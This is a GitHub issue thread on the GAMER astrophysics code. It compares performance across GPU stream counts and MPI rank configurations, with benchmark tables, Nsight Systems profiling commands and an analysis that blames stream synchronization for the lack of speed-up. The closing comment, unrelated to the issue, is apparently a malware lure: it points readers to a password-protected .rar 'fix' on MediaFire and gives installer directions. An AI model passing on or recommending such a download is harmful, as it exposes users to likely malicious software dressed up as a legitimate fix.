### ISSUE TITLE
Increasing `GPU_NSTREAM` does not enhance performance

### ISSUE THREAD

**Issue by koarakawaii** [gamer-project/gamer#347]
## Issues
* Increasing `GPU_NSTREAM` for `GAMER` running on `Spock` platform does not result in any performance gain (using `Perf_Overall` as metric), which is opposed to the observation in [`GAMER 2` paper](https://academic.oup.com/mnras/article/481/4/4815/5106358), Fig. 5.
* However, using multiple MPI ranks can harvest about `~1.9` times speed-up (see metric below). **Why MPI ranks can optimize GPU usage but streams cannot?**
![螢幕擷取畫面 2024-08-27 115932](https://github.com/user-attachments/assets/f1df06b4-8cef-43d8-8fae-9a943de10e6f)
>[!NOTE]
> [`K20X`](https://www.techpowerup.com/gpu-specs/tesla-k20x.c2315)'s architecture is `Kepler`
* Metric (run with `nsys profile` off):
    | `RankXThread ` |`GPU_NSTREAM`| Averaged `Perf_Overall` | Accumulated Time for `Flu_Adv` (s) | Accumulated Time Percentage for `Flu_Adv` |
    | :-----: | :-----: | :-----: | :-----: | :-----: |
    | 1X32 | 1 | 2.3668e+08 | 4100.43 | 87.787% |
    | 1X32 | 2 | 2.9351e+08 | 3221.56 | 85.395% |
    | 1X32 | 4 | 2.9881e+08 | 3165.45 | 85.466% |
    | 1X32 | 8 | 2.9150e+08 | 3238.99 | 85.236% |
    | 2X16 | 1 | 3.6865e+08 | 2495.44 | 83.168% |
    | 2X16 | 2 | 4.4064e+08 | 1999.24 | 79.495% |
    | 2X16 | 4 | 4.4752e+08 | 1934.79 | 78.141% |
    | 2X16 | 8 | 3.9993e+08 | 2231.59 | 79.581% |
    | **4X8**   | **1** | **4.5767e+08** | **1910.27** | **78.999%** |
    | 4X8   | 2 | 4.5726e+08 | 1919.73 | 79.298% |
    | 4X8   | 4 | 4.5165e+08 | 1920.74 | 78.380% |
    | 4X8   | 8 | 4.4038e+08 | 1932.00 | 76.873% |
    | 8X4   | 1 | 4.5478e+08 | 1913.43 | 78.635% |
    | 8X4   | 2 | 4.5306e+08 | 1911.66 | 78.256% |
    | 8X4   | 4 | 4.4839e+08 | 1923.96 | 77.990% |
    | 8X4   | 8 | 4.4831e+08 | 1925.32 | 77.980% |
    | 16X2 | 1 | 4.4958e+08 | 1919.41 | 77.963% |
    | 16X2 | 2 | 4.5297e+08 | 1921.19 | 78.648% |
    | 16X2 | 4 (GPU out of memory) | -- | -- | -- |
    | 16X2 | 8 (GPU out of memory) | -- | -- | -- |

## Test Problem Setup
   * `HYDRO`, `BlastWave`
   * `MAX_LEVEL = 0`
   * `N_LEVEL = 1`
   * `NX0_TOT_* = 1024`
   * `END_STEP = 1024`
   * `GAMER` commit HASH: `b1299c1e4448ceff4865ba3d684eb626c66abc5e`
   * `generate_make.sh`
       ```bash=python
       PYTHON=python3
       ${PYTHON} configure.py --machine=spock_intel --model=HYDRO --hdf5=true --nlevel=1 --gpu=true --mpi=true --max_patch 10000000
       ``` 
  * Platform: `Spock`, `2` nodes with `4` ranks X `8` threads, GPU enabled (RTX 3080 Ti)

> [!CAUTION]
> Since no `GRAVITY` in this test problem, the Poisson SOR performance related to `GPU_NSTREAM` is not measured.

## Nsight System Profile
   * Usage
       * Code Modification
           * Include header `"nvtx3/nvToolsExt.h"` in the `.cpp` file which containing the code block intended to be profiled
           * Bracket the code block by:
               ```bash=c
               nvtxRangePush("TAG_for_NAMING");                                                                                                          
               SOME_FUNCTION ....
               nvtxRangePop();
               ```
               , where `TAG_for_NAMING` is a naming string for identifying the code block in the Nsight System profiling report
           * Compile `GAMER`
       * Runtime Command
           ```bash=c
           mpirun -map-by ppr:PPR:socket:pe=PE --report-bindings nsys profile \
                       -t cuda,mpi,nvtx,openmp,ucx -o report_rank_%q{OMPI_COMM_WORLD_RANK} \
                       --force-overwrite=true --stats=true ./EXE 1>>LOG_FILE 2>&1
           ```

      * Read the report using `Nsight System` GUI; if multiple ranks is applied, choosing `New multi-report view` to select report generated by each rank
      * When viewing via the `Timeline View`, use `Pin row` to pin the entries you are interested in if the event list are too long
  
   * Results 
       * **1 Rank X 32 Threads X 1 Stream; Timing Solver**      
         | `4XSingle CPU+GPU Cycle  (Green Shaded)` |  `4XSingle CPU_Prepartion_Step` | `4XSingle Solver (H2D+Kernel+D2H)` | `4XSingle CPU_Closing_Step` | `Flu_Pre` | `Flu_Sol` | `Flu_Clo` |
         | :-----: | :-----: | :-----: | :-----: | :-----: | :-----: | :-----: |
         | 12.195 ms | 2.068 ms | 8.98 ms | 1.140 ms | 1.9875 s | 7.3940 s | 1.0237 s |
     
         ![gamer_BlastWave_CTU_1_ranksX32_threadsX1_streams_timing_solver_single_CPU+GPU_cycle](https://github.com/user-attachments/assets/67bd34ab-e6d2-427a-ab4c-0f8683dfa2be)

> [!Warning]
> Notice that we record `4XSingle CPU_Prepartion_Step` and `4XSingle CPU_Closing_Step` instead of `Single CPU_Prepartion_Step` and `Single CPU_Closing_Step` for this case.

   * **1 Rank X 32 Threads X 1 Stream; No Timing Solver**
      | `4XSingle CPU+GPU Cycle  (Green Shaded)` |  `Single CPU_Prepartion_Step` | `4XSingle Solver (H2D+Kernel+D2H)` | `Single CPU_Closing_Step` | `Flu_Adv` |
     | :-----: | :-----: | :-----: | :-----: | :-----: | 
     | 9.626 ms | 0.485 ms | 9.600 ms | 0.364 ms | 7.9745 s |
     
     ![gamer_BlastWave_CTU_1_ranksX32_threadsX1_streams_no_timing_solver_single_CPU+GPU_cycle](https://github.com/user-attachments/assets/f89045f5-ccda-4ff4-b96d-086e075ffbdc)

   * **4 Ranks X 8 Threads X 1 Stream; Timing Solver**
      | `4XSingle CPU+GPU Cycle  (Green Shaded)` |  `Single CPU_Prepartion_Step` | `4XSingle Solver (H2D+Kernel+D2H)` | `Single CPU_Closing_Step` | `Flu_Pre` | `Flu_Sol` | `Flu_Clo` |
     | :-----: | :-----: | :-----: | :-----: | :-----: | :-----: | :-----: |
     | 8.403 ms | 1.766 ms | 5.808 ms | 0.838 ms | 1.51737 s | 4.7710 s | 0.6636 s |

     ![gamer_BlastWave_CTU_4_ranksX8_threadsX1_streams_timing_solver_single_CPU+GPU_cycle](https://github.com/user-attachments/assets/347cccdf-3903-4bb1-bf95-ab1811ab780b)

   * **4 Ranks X 8 Threads X 1 Stream; No Timing Solver**
     | `4XSingle CPU+GPU Cycle  (Green Shaded)` |  `Single CPU_Prepartion_Step` | `4XSingle Solver (H2D+Kernel+D2H)` | `Single CPU_Closing_Step` | `Flu_Adv` |
     | :-----: | :-----: | :-----: | :-----: | :-----: | 
     | 4.628 ms | 1.763 ms | 4.630 ms | 0.711 ms | 3.7271 s |
     
     ![gamer_BlastWave_CTU_4_ranksX8_threadsX1_streams_no_timing_solver_single_CPU+GPU_cycle](https://github.com/user-attachments/assets/365eca8b-7d00-4df5-9584-ae27c79215a4)

> [!CAUTION]
> Strictly speaking, the time measured here is based on single CPU+GPU cycle, but we assume ideal overlapping between ranks and use this value for estimating the speed-up under this circumstance.

   * **1 Rank X 32 Threads X 4 Streams; Timing Solver**
      | `4XSingle CPU+GPU Cycle  (Green Shaded)` |  `Single CPU_Prepartion_Step` | `4XSingle Solver (Total H2D+Kernel+D2H)` | `Single CPU_Closing_Step` | `Flu_Pre` | `Flu_Sol` | `Flu_Clo` |
     | :-----: | :-----: | :-----: | :-----: | :-----: | :-----: | :-----: | 
     | 9.738 ms | 2.922 ms | 5.817 ms | 1.000 ms | 2.3186 s | 4.7370 s | 0.8580 s |

     ![gamer_BlastWave_CTU_1_ranksX32_threadsX4_streams_timing_solver_single_CPU+GPU_cycle](https://github.com/user-attachments/assets/a7ab1f29-2791-46fa-b4ee-0890f5143ebf)

   * **1 Rank X 32 Threads X 4 Streams; No Timing Solver**
      | `4XSingle CPU+GPU Cycle  (Green Shaded)` |  `Single CPU_Prepartion_Step` | `4XSingle Solver (Total H2D+Kernel+D2H)` | `Single CPU_Closing_Step` | `Flu_Adv` |
     | :-----: | :-----: | :-----: | :-----: | :-----: | 
     | 7.200 ms | 2.736 ms | 7.181 ms | 1.287 ms | 6.1529 s |
     
     ![gamer_BlastWave_CTU_1_ranksX32_threadsX4_streams_no_timing_solver_single_CPU+GPU_cycle](https://github.com/user-attachments/assets/1e979948-b267-4650-9c6e-ee91f5c3ba3b)

### Summary based on Nsight System Profiling
* When `Makefile` option `-DTIMING_SOLVER` is **off**, we see that the CPU computation blocks (`CPU_Prepartion_Step` and `CPU_Closing_Step`) are perfectly hidden by the GPU computation block (`Solver`), suggesting that the asynchronous CPU+GPU operation is working properly.
* When `GPU_NSTREAM = 4` (1 rankX32 threads), the GPU H2D and D2H copy overlap with GPU kernel execution, suggesting that the GPU streams are functioning. The kernel executing time is `~1.23 ms`, which is close to the `1.16 ms` kernel executing time for  `GPU_NSTREAM = 1` (1 rankX32 threads), i.e. the kernel efficiency is still maintained (for `GAMER`, if `FLU_GPU_NPGROUP` is set to `-1` in `Input__Parameter`, workload for each kernel is the same, irrelevant of the `GPU_NSTREAM`, so we expect the kernel execution times being the same for using different streams). So **why using 4 streams does not speed up, meanwhile using 4 ranks is more efficient** (actually, the kernel execution time is even longer for 4 rankX8 threads, which is about `2.2-2.3 ms`, but the overall performance still get improved)**?**
    * To answer this problem, first notice that when using GPU streams, all the streams will be synchronized after each GPU cycle (H2D+kernel+D2H) is completed, such that fluid data array (processed by different GPU streams, then transferred back to host) can be safely copied to `amr->patch` pointer. This synchronization implies that **at the beginning and the end of GPU operations, data-transfer/computation between different streams will not have overlapping (see figure in `1 Rank X 32 Threads X 4 Streams; No Timing Solver`), and thus degrades the GPU performance**. 
    * The conclusion above is supported by the time profiles of  **`1 Rank X 32 Threads X 4 Streams; Timing Solver`** v.s. **`4 Ranks X 8 Threads X 1 Stream; Timing Solver`** cases, where all streams/ranks are synchronized after each GPU cycle (H2D+kernel+D2H) is completed. Under these circumstances, a single `4XSingle Solver (Total H2D+Kernel+D2H)` took `5.817 ms` and `5.808 ms` respectively, suggesting that **using either streams or MPI ranks (with MPS) can render similar GPU efficiency**.
    * Hence, **the inefficiency of applying GPU streams we observed is probably caused by the required synchronization at the end of GPU cycle (H2D+kernel+D2H)**.
* Based on the conclusion and the measured metric, it might be **more advantageous to use 4 ranks X 8 threads configuration to run `GAMER`, without using multiple GPU streams**.

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
